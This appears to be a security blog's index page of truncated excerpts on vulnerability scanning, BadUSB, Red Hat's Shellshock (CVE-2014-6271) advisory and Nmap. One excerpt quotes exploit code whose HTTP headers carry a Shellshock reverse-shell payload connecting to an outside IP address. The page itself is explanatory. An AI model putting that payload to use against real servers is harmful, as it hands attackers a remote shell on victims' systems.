Why perform Alpha Scans on a regular basis?
People are always asking me – “Why should I have you run an Alpha scan for me?” Because a hacker may have been there already – not a “good” ethical…
Defend Your Systems
People are always asking me – “Why should I have you run an Alpha scan for me?” Because a hacker may have been there already – not a “good” ethical…
What is this BadUSB? Extremetech.com has a story and the Youtube video from BlackHat 2014(not Derbycon as in article) The controller can be hacked and code inserted inside the USB…
Google Web Cache of the exploit char *request = “GET %s HTTP/1.0\r\nUser-Agent: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nCookie: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nHost:…
RedHat customer portal Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on…
nmap.org has some info, but we also review sites with insight into scanning. Nmap is short for Network Mapper. Ethical hacking – Penetration Testing By Bhargav Tandel Nix Craft also…